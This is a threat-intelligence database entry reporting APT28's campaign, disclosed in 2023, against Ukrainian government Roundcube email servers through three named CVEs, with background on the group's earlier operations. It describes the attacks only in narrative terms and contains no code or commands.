Cyber Incident Victim: KP in Ukraine
Date:
Nov 2021
Location:
Ukraine
Summary
Russian APT28 hackers, affiliated with the GRU, compromised Ukrainian government email servers by exploiting Roundcube vulnerabilities to deliver malicious emails. The attackers deployed scripts redirecting targeted individuals' incoming emails to controlled addresses while stealing address books, session cookies, and database information for military intelligence collection. This campaign targeted government entities, a prosecutor's office, and military infrastructure organizations, aligning with broader APT28 operations exploiting unpatched software vulnerabilities to support Russian strategic objectives. The group's infrastructure was operational for an extended period, overlapping with prior attacks leveraging Outlook and Cisco router zero-days against European and North American targets.
| CIA Posture | Motives | Tactics, Techniques & Procedures |
|---|---|---|
| Available to members | 2 motives | 1 technique |
| Threat Actor | Type | Location |
|---|---|---|
| 1 actor | Available to members | Available to members |
Description
In June 2023, Ukraine’s Computer Emergency Response Team (CERT-UA) and Recorded Future’s Insikt Group disclosed that Russian military intelligence hackers from APT28 (also known as BlueDelta, Fancy Bear, Sednit, and Sofacy) breached Roundcube email servers belonging to multiple Ukrainian government entities and other organizations. The attackers exploited three vulnerabilities in Roundcube webmail software—CVE-2020-35730, CVE-2020-12641, and CVE-2021-44026—to compromise unpatched servers. APT28 used phishing emails referencing the ongoing Russia-Ukraine conflict to trick recipients into triggering these exploits, enabling unauthorized access without user interaction. Upon breaching the servers, the hackers deployed malicious scripts to redirect incoming emails from targeted individuals to attacker-controlled addresses. These scripts also harvested Roundcube address books, session cookies, and other database-stored information for reconnaissance and intelligence-gathering purposes. The campaign’s infrastructure had been operational since at least November 2021, with specific targets including a regional Ukrainian prosecutor’s office, a central executive authority, and an organization involved in military aircraft infrastructure upgrades. Investigators concluded the operation aimed to steal military intelligence to support Russia’s invasion of Ukraine.
APT28’s tactics overlapped with previous campaigns, including a 2022 exploitation of Microsoft Outlook zero-day CVE-2023-23397 to target European government, military, energy, and transportation organizations. In that campaign, the group stole credentials to move laterally within networks and exfiltrated emails by altering mailbox permissions. Google’s Threat Analysis Group noted APT28 was among Russian actors responsible for approximately 60% of phishing emails targeting Ukraine in early 2023. The group also exploited a Cisco router zero-day in 2023 to deploy Jaguar Tooth malware against U.S. and EU targets. APT28 has a history of high-profile cyber-espionage, including the 2015 breach of the German Federal Parliament and the 2016 attacks on the Democratic National Committee, which led to U.S. indictments and EU sanctions against its members in 2020. The Ukrainian breach underscored APT28’s continued focus on exploiting software vulnerabilities to gather strategic intelligence amid the ongoing conflict.